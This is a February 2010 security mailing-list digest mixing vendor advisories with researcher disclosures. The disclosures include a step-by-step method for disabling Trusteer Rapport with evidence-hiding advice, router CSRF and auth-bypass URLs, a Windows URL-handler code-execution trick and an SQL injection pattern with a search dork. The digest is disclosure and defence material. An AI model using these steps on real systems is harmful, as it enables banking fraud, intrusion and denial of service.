Trusteer Rapport Security Circumvention

2010-02-16 Thread barkley
Hi,


Trusteer is an innovative software to combat fraud, thus it's global uptake in 
the financial sector. Trusteer also seems quite adamant that their software is 
bullet-proof, their website pretty much sums it up. However, on having a closer 
look and some tinkering, I discovered a complete no brainer vector for 
circumventing Trusteer's security. I've tested this on various XP platforms 
successfuly, please feel free to notify the vendor as you wish and/or to 
publish whatever you feel appropriate under the circumstances.


http://www.trusteer.com/solutions
http://www.trusteer.com/product-0
http://www.trusteer.com/product/technology
Trusteer Rapport locks down your browser once you connect to a sensitive 
website such as your bank. Any malicious software that tries to ride on the 
browser is left out of the locked down browser, and cannot access  your 
sensitive information and transactions. Rapport also locks down communication 
between your browser and the bank, preventing any network-based attack from 
diverting traffic to fraudulent locations.


The following illustrates how malware on entering a system by whichever means, 
and on detecting Trusteer's services, can easily (automated/scripted) disable 
Trusteer's security for whatever malevolent purposes.


Step-by-step illustration, how to easily circumvent Trusteer's security.

Firstly, disable Trusteer's service (RapportMgmtService.exe) in your active 
Hardware Profile. Trusteer doesn't protect this option, thus this is a good 
starting point for now.
i.e.
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_RAPPORTMGMTSERVICE\]
"CSConfigFlags"=dword:0001

NOTE: This in fact disables Trusteer's service (RapportMgmtService.exe) in the 
Services.msc GUI
i.e.
Services.msc > "Rapport Management Service" > "Log On" > "Hardware Profile" > 
"Disabled"


On the very next reboot, at least one reboot is required to disable the kernel 
driver (RapportPG.sys), Trusteer's service (RapportMgmtService.exe) should now 
be inactive/disabled, and thus you'll be able to rename Trusteer's now 
unprotected folders.
i.e. Command Prompt
C:\> cd \"Program Files"
C:\> rename Trusteer TrusBeer

NOTE: At this point the web browser's not protected by Trusteer, nor is 
Trusteer's software & system settings protected, thus pretty much open to your 
imagination.


The following step is not required, especially seeing as Trusteer's service 
(RapportMgmtService.exe) was disabled previously in the active Hardware 
Profile. However, should you also wish to reconfigure Trusteer's now 
unprotected drivers & services to start manually, or even disable/delete 
completely, you may or may not have to reboot one more time, as the following 
step may need another reboot to take advantage of the previously now renamed 
unprotected folders in the previous step.
i.e. Command Prompt
C:\> sc config RapportMgmtService start= demand
C:\> sc config RapportPG start= demand


Should you wish to cover your tracks (you'll also have to clear event logs), 
rename Trusteer's home folder back to the original and restore the Hardware 
Profile registry entry.
i.e.
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_RAPPORTMGMTSERVICE\]
"CSConfigFlags"=dword:

i.e. Command Prompt
C:\> cd \"Program Files"
C:\> rename TrusBeer Trusteer


Cheers

Andrew Barkley
(-_-)


Huawei HG510 CSRF, Auth Bypass, DoS

2010-02-16 Thread ivan . markovic
Hello,


Huawei HG510 is a device offered by the Serbian telecom operator, to provide 
ADSL Internet connection.
Administration of settings on this device is allowed only from local LAN 
network but not only from
private IP address (eg 192.168.1.1) then You can access with public IP address 
(only from local LAN again).

There is no CSRF protection so we can create malicious web pages and create 
some CSRF attacks.
Is user is logged on his device we can change passwords or some another 
settings.

POC:

http://PUBLIC_IP_OF_USER/password.cgi?sysPassword=BASE64_NEW_PASSWORD


When I testing this I found one strange behavior with /rebootinfo.cgi (reboot 
device script).
Normaly for all this CSRF user must be logged into device web interface but if 
we request: 
http://PUBLIC_IP_OF_USER/rebootinfo.cgi, basic authentication is bypassed and 
device
is rebooted.

So we have CSRF + Authentication Bypass that lead to DoS of end user.

If someone have any questions about this please contact me.


Best regards,
Ivan Markovic


IE address bar characters into a small feature

2010-02-16 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Internet Explorer
# Version: 8.0
#
Vulnerability: IE address bar characters into a small feature 
My IE 8 on the address bar will automatically enter the url of the "\" (0x5c) 
transformed into "/" (0x2f)
Example: www.securitylab.ir \a Converted to www.securitylab.ir/a
Recently found that some phishing sites take advantage of this feature to 
bypass some security checks, it is hereby to be a mark
#
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###


Insomnia : ISVA-100216.1 - Windows URL Handling Vulnerability

2010-02-16 Thread Brett Moore
__

 Insomnia Security Vulnerability Advisory: ISVA-100216.1
___

 Name: Windows URL Handling Vulnerability 
 Released: 16 February 2010
  
 Vendor Link: 
http://www.microsoft.com/
  
 Affected Products:
Windows 2000, Windows XP, Windows 2003, Windows Vista
 
 Original Advisory: 
http://www.insomniasec.com/advisories/ISVA-100216.1.htm
 
 Researcher: 
Brett Moore, Insomnia Security
http://www.insomniasec.com
___

___

 Description
___

A flaw exists with the handling of malformed URL's passed through
the ShellExeute() API. The vulnerability does not directly cause
an issue within Windows itself however, applications that call 
the flawed API may be vulnerable to various attacks, one of which 
is shown in this report.

___

 Details
___

The vulnerability is reached when the malformed URL contains #: 
and can be used to reference local files.

Two such examples are shown here;
acrobat://test/#://../../c:/windows/system32/calc.exe
or
anything://test/#://../../c:/windows/system32/calc.exe

The results will be different dependant on where the URL is used
and which OS platform is in use. 

Some examples are shown here;

Start->Run
Calc.exe is executed without prompt

IE URL Bar or HREF
User is prompted to execute calc.exe

Word Document
User is prompted to open acrobat link

PDF Document
Calc.exe is executed without prompt

Firefox
Firefox will not follow the URL

Safari
Calc.exe is executed without prompt  
  
___

 Potential Exploit
___
  
Safari will not access the local file through the standard
file:// link, but will execute the local file through the malformed
link.

One method of executable delivery is through the onenote:// 
URL protocol if Microsoft OneNote is installed.

OneNote will automatically open and process a onenote file shared
over an SMB share. Any executables stored within the onenote file
will be cached locally. This is done by downloading the embedded
executables and storing them in a known location.

C:/Users/[USERNAME]/AppData/Local/Microsoft/OneNote/12.0/OneNoteOfflineCache
_Files/

This file can then be executed through the URL handling vulnerability
leading to an automatic code execution issue through Safari.

Obviously there are some requirements for this exploit;
+ the target user name must be known
+ Microsoft OneNote must be installed
+ SMB access out must be allowed
  
___

 Solution
___

Microsoft have released a security update to address this issue;
http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx
http://www.microsoft.com/technet/security/Bulletin/MS10-007.mspx

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.
___
 
Insomnia Security Vulnerability Advisory: ISVA-100216.1
___




Pogodny CMS SQL vulnerabilities

2010-02-16 Thread Maciej Gojny

# Exploit Title: [Pogodny CMS SQL injection]
# Date: [08.02.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.cms.michalin.pl/moduly/pogodny/]
# Version: [ALL]
# Tested on: [freebsd / ubuntu]

 { Ariko-Security - Advisory #2/2/2010 } =

  SQL injection vulnerability in Pogodny CMS


Vendor's Description of Software:
# http://www.cms.michalin.pl/moduly/pogodny/  (PL)
# vendor's DEMO http://www.cms.kr.media.pl/

Dork:
#pogodny CMS

Application Info:
# Name: pogodny CMS
# Versions: ALL

Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: High

Fix: 
# N/A Vendor notified 08.02.2010

It was found that "pogodny CMS" does not validate properly the "id" parameter
value.

Solution:
# Input validation of "id" parameter should be corrected.


Vulnerability:
# http://[HOST]/?modul=niusy&id=61[Sqli]

Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com


Ariko-Security
v...@ariko-security.com
tel.: +48512946012 (Mo-Fr 10.00-20.00 CET)



VMSA-2010-0003 ESX Service Console update for net-snmp

2010-02-16 Thread VMware Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
   VMware Security Advisory

Advisory ID:   VMSA-2010-0003
Synopsis:  ESX Service Console update for net-snmp
Issue date:2010-02-16
Updated on:2010-02-16 (initial release of advisory)
CVE numbers:   CVE-2009-1887
- -

1. Summary

   Update for Service Console package net-snmp

2. Relevant releases

   VMware ESX 3.5 without patch ESX350-201002401-SG

3. Problem Description

 a. Service Console package net-snmp updated

This patch updates the service console package for net-snmp,
net-snmp-utils, and net-snmp-libs to version
net-snmp-5.0.9-2.30E.28. This net-snmp update fixes a divide-by-
zero flaw in the snmpd daemon. A remote attacker could issue a
specially crafted GETBULK request that could cause the snmpd daemon
to fail.

This vulnerability was introduced by an incorrect fix for
CVE-2008-4309.

The Common Vulnerabilities and Exposures Project (cve.mitre.org) has
assigned the name CVE-2009-1887 to this issue.

Note: After installing the previous patch for net-snmp
(ESX350-200901409-SG), running the snmpbulkwalk command with the
parameter -CnX results in no output, and the snmpd daemon stops.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware Product   Running  Replace with/
ProductVersion   on   Apply Patch
=    ===  =
VirtualCenter  any   Windows  not affected

hosted *   any   any  not affected

ESXi   any   ESXi not affected

ESX4.0   ESX  not affected
ESX3.5   ESX  ESX350-201002401-SG
ESX3.0.3 ESX  affected, patch pending
ESX2.5.5 ESX  not affected

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

4. Solution

   Please review the patch/release notes for your product and version
   and verify the md5sum of your downloaded file.

   ESX 3.5
   ---
   ESX350-201002401-SG
   http://download3.vmware.com/software/vi/ESX350-201002401-SG.zip
   md5sum: a91428cb6bc2da794f581aefd5eef010
   http://kb.vmware.com/kb/1017660

5. References

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1887

- -
6. Change log

2010-02-16  VMSA-2010-0003
Initial security advisory after release of patches for ESX 3.5
on 2010-02-16.

- 
7. Contact

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk

E-mail:  security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2010 VMware Inc.  All rights reserved.
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.14 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkt66IQACgkQS2KysvBH1xmhuACbBL6u9x1WUt/wG2F45y2jjkHs
WIIAn0tgLrLQGODyeK5pI8cPBIqsslNL
=Fk9e
-END PGP SIGNATURE-


MITKRB5-SA-2010-001 [CVE-2010-0283] krb5-1.7 KDC denial of service

2010-02-16 Thread Tom Yu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

MITKRB5-SA-2010-001

MIT krb5 Security Advisory 2010-001
Original release: 2010-02-16
Last update: 2010-02-16

Topic: krb5-1.7 KDC denial of service

CVE-2010-0283
krb5-1.7 KDC denial of service

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:F/RL:O/RC:C

CVSSv2 Base Score:  7.8

Access Vector:  Network
Access Complexity:  Low
Authentication: None
Confidentiality Impact: None
Integrity Impact:   None
Availability Impact:Complete

CVSSv2 Temporal Score:  6.4

Exploitability: Functional
Remediation Level:  Official Fix
Report Confidence:  Confirmed

SUMMARY
===

Improper input validation in the KDC can cause an assertion failure
and process termination.  A functional exploit exists, but is not
known to be publicly circulated.  Releases prior to krb5-1.7 did not
contain the vulnerable code.

This is an implementation vulnerability in MIT krb5, and is not a
vulnerability in the Kerberos protocol.

IMPACT
==

An unauthenticated remote attacker can send an invalid request to a
KDC process that will cause it to crash due to an assertion failure,
creating a denial of service.

AFFECTED SOFTWARE
=

* KDC in MIT krb5-1.7 and later

* Prerelease (alpha test) code for krb5-1.8 is also vulnerable.

FIXES
=

* The upcoming krb5-1.7.2 release will contain a fix for this
  vulnerability.

* The final krb5-1.8 release will contain a fix for this
  vulnerability.

* For the krb5-1.7 and krb5-1.7.1 releases, apply the following patch:

diff --git a/src/kdc/do_as_req.c b/src/kdc/do_as_req.c
index 52fbda5..680e6a1 100644
- --- a/src/kdc/do_as_req.c
+++ b/src/kdc/do_as_req.c
@@ -137,6 +137,11 @@ process_as_req(krb5_kdc_req *request, krb5_data *req_pkt,
 session_key.contents = 0;
 enc_tkt_reply.authorization_data = NULL;
 
+if (request->msg_type != KRB5_AS_REQ) {
+status = "msg_type mismatch";
+errcode = KRB5_BADMSGTYPE;
+goto errout;
+}
 errcode = kdc_make_rstate(&state);
 if (errcode != 0) {
status = "constructing state";
diff --git a/src/kdc/do_tgs_req.c b/src/kdc/do_tgs_req.c
index 12180ff..c8cf692 100644
- --- a/src/kdc/do_tgs_req.c
+++ b/src/kdc/do_tgs_req.c
@@ -135,6 +135,8 @@ process_tgs_req(krb5_data *pkt, const krb5_fulladdr *from,
 retval = decode_krb5_tgs_req(pkt, &request);
 if (retval)
 return retval;
+if (request->msg_type != KRB5_TGS_REQ)
+return KRB5_BADMSGTYPE;
 
 /*
  * setup_server_realm() sets up the global realm-specific data pointer.
diff --git a/src/kdc/fast_util.c b/src/kdc/fast_util.c
index d88e0cb..2639047 100644
- --- a/src/kdc/fast_util.c
+++ b/src/kdc/fast_util.c
@@ -384,7 +384,7 @@ krb5_error_code kdc_fast_handle_error
 krb5_data *encoded_e_data = NULL;
 
 memset(outer_pa, 0, sizeof(outer_pa));
- -if (!state->armor_key)
+if (!state || !state->armor_key)
return 0;
 fx_error = *err;
 fx_error.e_data.data = NULL;



  This patch is also available at

  http://web.mit.edu/kerberos/advisories/2010-001-patch.txt

  A PGP-signed patch is available at

  http://web.mit.edu/kerberos/advisories/2010-001-patch.txt.asc


* The above patch will apply to krb5-1.8 prerelease code if whitespace
  is ignored.

REFERENCES
==

This announcement is posted at:

  http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-001.txt

This announcement and related security advisories may be found on the
MIT Kerberos security advisory page at:

http://web.mit.edu/kerberos/advisories/index.html

The main MIT Kerberos web page is at:

http://web.mit.edu/kerberos/index.html

CVSSv2:

http://www.first.org/cvss/cvss-guide.html
http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

CVE: CVE-2010-0283
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0283

ACKNOWLEDGMENTS
===

Thanks to Emmanuel Bouillon (NATO C3 Agency) for discovering and
reporting this vulnerability.

CONTACT
===

The MIT Kerberos Team security contact address is
.  When sending sensitive information,
please PGP-encrypt it using the following key:

pub   2048R/8B8DF501 2010-01-15 [expires: 2011-02-01]
uid MIT Kerberos Team Security Contact 

DETAILS
===

In new code introduced in the KDC for the krb5-1.7 release, code that
handles authorization data (handle_tgt_authdata()) contains a call to
assert() that ensures that the function arguments are consistent with
value of the msg_type field of the request that it is processing.
This assertion can fail because the msg_type can be inconsistent with
the ASN.1 tag that previously-executed code used to choose whether to
process the request as a request for initial tickets (AS-REQ) or as a
request for additional tickets (TGS-REQ).

REVISION HISTORY


2010-02-16  original release

Copyright (C) 2010 Massachusetts Institute of Technology
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (SunOS)

iEYEARECAA

VUPEN Security Research - OpenOffice Word Document Processing Heap Overflow Vulnerabilities

2010-02-16 Thread VUPEN Security Research
VUPEN Security Research - OpenOffice.org Word Document Handling Heap 
Overflow Vulnerabilities


http://www.vupen.com/english/research.php


I. BACKGROUND
-

OpenOffice.org (OO.o or OOo), commonly known as OpenOffice, is an
open source software application suite available for a number of
different computer operating systems. It is distributed as free
software and written using its own GUI toolkit. It supports the
ISO/IEC standard OpenDocument Format (ODF) for data interchange
as its default file format, as well as Microsoft Office formats
among others. (Wikipedia)


II. DESCRIPTION
- 


VUPEN Vulnerability Research Team discovered critical vulnerabilities
affecting OpenOffice.org.

The first vulnerability is caused by a heap overflow error when
processing malformed "sprmTDefTable" records in a Word document,
which could be exploited by attackers to execute arbitrary code.

The second vulnerability is caused by a heap overflow error when
processing malformed "sprmTSetBrc" records in a Word document,
which could be exploited by attackers to compromise a vulnerable
system.


III. AFFECTED PRODUCTS


OpenOffice.org versions prior to 3.2


IV. Exploits - PoCs & Binary Analysis


In-depth binary analysis of the vulnerabilities and exploits/PoCs
have been released by VUPEN Security through the VUPEN Exploits &
PoCs Service :

http://www.vupen.com/exploits


V. SOLUTION
 


Upgrade to OpenOffice.org version 3.2


VI. CREDIT
-- 


The vulnerabilities were discovered by Nicolas JOLY of VUPEN Security


VII. ABOUT VUPEN Security
-

VUPEN is a leading IT security research company providing vulnerability
management services to allow enterprises and organizations to eliminate
vulnerabilities before they can be exploited, ensure security policy
compliance and meaningfully measure and manage risks.

VUPEN also provides research services for security vendors (antivirus,
IDS, IPS,etc) to supplement their internal vulnerability research efforts
and quickly develop vulnerability-based and exploit-based signatures,
rules, and filters, and proactively protect their customers against
potential threats.

* VUPEN Vulnerability Notification Service:

http://www.vupen.com/english/services

* VUPEN Exploits and In-Depth Vulnerability Analysis:

http://www.vupen.com/exploits


VIII. REFERENCES
--

http://www.vupen.com/english/advisories/2010/0366
http://www.openoffice.org/security/cves/CVE-2009-3301-3302.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3302



IX. DISCLOSURE TIMELINE
--- 


2009-11-03 - Vendor notified
2009-11-05 - Vendor response
2009-11-10 - Status update received
2009-12-21 - Status update received
2010-02-02 - Status update received
2010-02-12 - Coordinated public Disclosure





Re: Joomla (Jw_allVideos) Remote File Download Vulnerability

2010-02-16 Thread lafrancevi
Hello!



This is no longer relevant this extension is now at version 3.1 This was grab 
from a greez post


[ MDVSA-2010:038 ] maildrop

2010-02-16 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:038
 http://www.mandriva.com/security/
 ___

 Package : maildrop
 Date: February 16, 2010
 Affected: Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability have been discovered and corrected in maildrop:
 
 main.C in maildrop 2.3.0 and earlier, when run by root with the -d
 option, uses the gid of root for execution of the .mailfilter file in
 a user's home directory, which allows local users to gain privileges
 via a crafted file (CVE-2010-0301).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0301
 ___

 Updated Packages:

 Corporate 4.0:
 f6b752753fa1a4e5fb050915672ca251  
corporate/4.0/i586/maildrop-1.7.0-9.1.20060mlcs4.i586.rpm
 c30751bbbaa99dbe6bf787280ad1e163  
corporate/4.0/i586/maildrop-devel-1.7.0-9.1.20060mlcs4.i586.rpm
 ac29677303ed83a59d852fc202d2b39e  
corporate/4.0/i586/maildrop-mysql-1.7.0-9.1.20060mlcs4.i586.rpm
 1d0219502b50788dcfc6cf5651c5c4aa  
corporate/4.0/i586/maildrop-openldap-1.7.0-9.1.20060mlcs4.i586.rpm 
 e1862d87d5f4003dbe722f33dc5f0d82  
corporate/4.0/SRPMS/maildrop-1.7.0-9.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 cdf43f77a101efc865d290e4abd16c08  
corporate/4.0/x86_64/maildrop-1.7.0-9.1.20060mlcs4.x86_64.rpm
 373c837656ef6099862e8cd89df7dc69  
corporate/4.0/x86_64/maildrop-devel-1.7.0-9.1.20060mlcs4.x86_64.rpm
 d5b96bb02e49413db3aefd660ee34203  
corporate/4.0/x86_64/maildrop-mysql-1.7.0-9.1.20060mlcs4.x86_64.rpm
 2c768ab880f838c7c3513ae6f8bcc962  
corporate/4.0/x86_64/maildrop-openldap-1.7.0-9.1.20060mlcs4.x86_64.rpm 
 e1862d87d5f4003dbe722f33dc5f0d82  
corporate/4.0/SRPMS/maildrop-1.7.0-9.1.20060mlcs4.src.rpm

 Mandriva Enterprise Server 5:
 eee3e4db386d93afc826f636fa4d8f83  mes5/i586/maildrop-1.7.0-14.1mdvmes5.i586.rpm
 f11f173c784f5b13e103412ef1b80fbb  
mes5/i586/maildrop-devel-1.7.0-14.1mdvmes5.i586.rpm
 41653a4ef502a213639fef75b731bd94  
mes5/i586/maildrop-mysql-1.7.0-14.1mdvmes5.i586.rpm
 58180f1d9d33f553dec2cced968aa60d  
mes5/i586/maildrop-openldap-1.7.0-14.1mdvmes5.i586.rpm 
 c17caf47894ecd0d5b435b4ba767e561  mes5/SRPMS/maildrop-1.7.0-14.1mdvmes5.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 dd15808097dda7662345f5e54c597d45  
mes5/x86_64/maildrop-1.7.0-14.1mdvmes5.x86_64.rpm
 ebb970d1a70d506119646edc096f8d3c  
mes5/x86_64/maildrop-devel-1.7.0-14.1mdvmes5.x86_64.rpm
 44922a84217f505350c3c5e489ec8088  
mes5/x86_64/maildrop-mysql-1.7.0-14.1mdvmes5.x86_64.rpm
 15217994457847511ea2ae7291e8c556  
mes5/x86_64/maildrop-openldap-1.7.0-14.1mdvmes5.x86_64.rpm 
 c17caf47894ecd0d5b435b4ba767e561  mes5/SRPMS/maildrop-1.7.0-14.1mdvmes5.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLes4TmqjQ0CJFipgRAjrEAJ9oam8bmZsk0DjKC3TvrYclBeKelwCfSoJt
Z4Oy5RxoCppnEo5V7zXM6Ew=
=SMPt
-END PGP SIGNATURE-



Enomaly ECP: Multiple vulnerabilities in VMcasting protocol & implementation.

2010-02-16 Thread sam . johnston
Enomaly ECP: Multiple vulnerabilities in VMcasting protocol & implementation.



Synopsis



Enomaly ECP up to and including v3.0.4 is believed to contain an insecure

silent update mechanism that could allow a remote attacker to execute

arbitrary code as root, and to inject or modify VM workloads for execution

within user environment or to replay older, insecure workloads.



Both the Enomaly ECP implementation and the VMcasting protocol itself are

believed to be vulnerable.



Background



Enomaly ECP is management software for virtual machines in cloud computing 

environments.



Description



Sam Johnston (http://samj.net/) of Australian Online Solutions

(http://www.aos.net.au) reported that the vmfeed module, an insecure

implementation of the insecure VMcasting protocol (http://www.vmcasting.org/)

includes a silent update mechanism that downloads and executes Python code

from Enomaly's corporate web server (http://enomaly.com/fileadmin/eggs/)

over HTTP, without authentication or integrity checks. The code is triggered

when the "application/python-egg" MIME type is encountered.



The module also contains functionality for downloading workloads (virtual

machines) from a feed which is itself retrieved over HTTP. While the VMcasting

protocol (http://www.vmcasting.org/) describes a mechanism for digitally

signing payloads, the mechanism is not implemented and there is no requirement

to transfer feeds securely (e.g. over HTTPS). The implementation itself

actively rejects URLs that do not start with "http" or "ftp" with an error.



The module has the following feeds hardcoded:

 - Enomalism VMCasting Test Feed [http://enomalism.com/vmcast_appliances.php]

 - VMCasting Production Module Feed [http://enomalism.com/vmcast_modules.php]



Impact



Combined with the ability to intercept requests to Enomaly's corporate web

server by other means such as ARP or DNS spoofing, or compromise the server

itself or any intermediary server, it may be possible to execute arbitrary

commands as the root user on any server requesting the feeds. It may also be

possible for an attacker to run workloads of their choice, to modify existing

workloads and to replay old, known-insecure workloads (even if signed).



Workaround



Resolve enomalism.com and enomaly.com to 127.0.0.1 in affected servers' hosts

files or migrate to OpenECP which includes fixes for the vulnerabilities.



Resolution



There is no resolution at this time as the feature cannot be disabled. Vendor

did not confirm whether subsequent/future releases [will] address the problem.



History



2009-11-02 Open source distributions for Enomaly ECP removed from Internet.

2010-01-06 Email request for open source code Enomaly ECP code denied by CEO.

2010-02-03 Public discussion of vulnerability, verified in current source.

2010-02-03 Strategic Advisor & Board Member claims "Many of the items have

been addressed in [Service Provider Edition and soon to be released High

Assurance] editions. We will review your comments above for future inclusion

into our product road map". Fails to identify which issues remain.

2010-02-09 OpenECP forked from Enomaly ECP, resolves vulnerabilities.

2010-02-09 Chief Technologist claims "ECP 3.0 is a significantly different

product than 2.0 servicing different market needs. [...] Technically ECP2.0

was Enomalism 2.0, not the Elastic Computing platform."

2010-02-10 Changelogs showing common lineage are removed from Internet.

2010-02-?? http://src.enomaly.com is restored claiming "Our current platform,

Enomaly ECP Service Provider Edition, is a completely different product."

2010-02-16 Vulnerability report released unverified.



Multiple Stored XSS in XOOPS 2.4.4 Admin Section

2010-02-16 Thread beenudel1986
# Greetz to all Darkc0de ,AI,ICW, AH Memebers
# Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, 
lowlz,Eberly,Sumit,
#
# Author: Beenu Arora
# 
# Home  : www.BeenuArora.com
# 
# Email : beenudel1...@gmail.com 
# 
# Share the c0de! 
# 
 
# 
# Exploit: Multiple Stored XSS in XOOPS 2.4.4 Admin Section
# 
# AppSite: www.xoops.org
# 
# Tested Version : 2.4.4
# 
# Request: POST
#
# Sample URLs:-http://localhost/xoops/htdocs/modules/system/admin/groupperm.php
# http://localhost/xoops/htdocs/modules/system/admin.php
#
# 
 


[USN-901-1] Squid vulnerabilities

2010-02-16 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-901-1  February 16, 2010
squid vulnerabilities
CVE-2009-2855, CVE-2010-0308
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  squid   2.5.12-4ubuntu2.5

Ubuntu 8.04 LTS:
  squid   2.6.18-1ubuntu3.1

Ubuntu 8.10:
  squid   2.7.STABLE3-1ubuntu2.2

Ubuntu 9.04:
  squid   2.7.STABLE3-4.1ubuntu1.1

Ubuntu 9.10:
  squid   2.7.STABLE6-2ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that Squid incorrectly handled certain auth headers. A
remote attacker could exploit this with a specially-crafted auth header
and cause Squid to go into an infinite loop, resulting in a denial of
service. This issue only affected Ubuntu 8.10, 9.04 and 9.10.
(CVE-2009-2855)

It was discovered that Squid incorrectly handled certain DNS packets. A
remote attacker could exploit this with a specially-crafted DNS packet
and cause Squid to crash, resulting in a denial of service. (CVE-2010-0308)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5.diff.gz
  Size/MD5:   248533 2454656350ab9b5410483e80a79128c6

http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5.dsc
  Size/MD5:  675 fd131c2b5c03f21f497f31b69c2eae06
http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12.orig.tar.gz
  Size/MD5:  1407261 1fc92afd1e858a51a2ebeba28cb76656

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid-common_2.5.12-4ubuntu2.5_all.deb
  Size/MD5:   203524 2455400b6eb3805ff0c1d2392068178f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5_amd64.deb
  Size/MD5:   844242 1afcf81c42b19962cdd5365bc5b6aa69

http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.5.12-4ubuntu2.5_amd64.deb
  Size/MD5:   106136 6ee8e11da7009f677e4fd30e9b047fe7

http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squidclient_2.5.12-4ubuntu2.5_amd64.deb
  Size/MD5:79628 d7ecffbbf1a63b895773920663c4aef4

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5_i386.deb
  Size/MD5:   756608 79994c8370fc139cb5a551c4997c5870

http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.5.12-4ubuntu2.5_i386.deb
  Size/MD5:   104932 b8f0b74ce627f661023a323373993284

http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squidclient_2.5.12-4ubuntu2.5_i386.deb
  Size/MD5:78476 659174c97acab076331616e189f8c2fb

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5_powerpc.deb
  Size/MD5:   839082 ee00e2ff00fd02a521e76acb9a53feda

http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.5.12-4ubuntu2.5_powerpc.deb
  Size/MD5:   105826 d9a3baf35ddb005d446fdae238beffaa

http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squidclient_2.5.12-4ubuntu2.5_powerpc.deb
  Size/MD5:79588 b96f5eb6f8b36b9e7984876f4fe87033

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5_sparc.deb
  Size/MD5:   793288 e0229f7b2eeac59292bd1e72196f719b

http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.5.12-4ubuntu2.5_sparc.deb
  Size/MD5:   105312 12b27303a17ddbf229563d664fc40f01

http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squidclient_2.5.12-4ubuntu2.5_sparc.deb
  Size/MD5:79540 9d6e00216f18b6c151d0870b5f916b81

Updated packages for Ubuntu 8.04 LTS:

  Source archives:


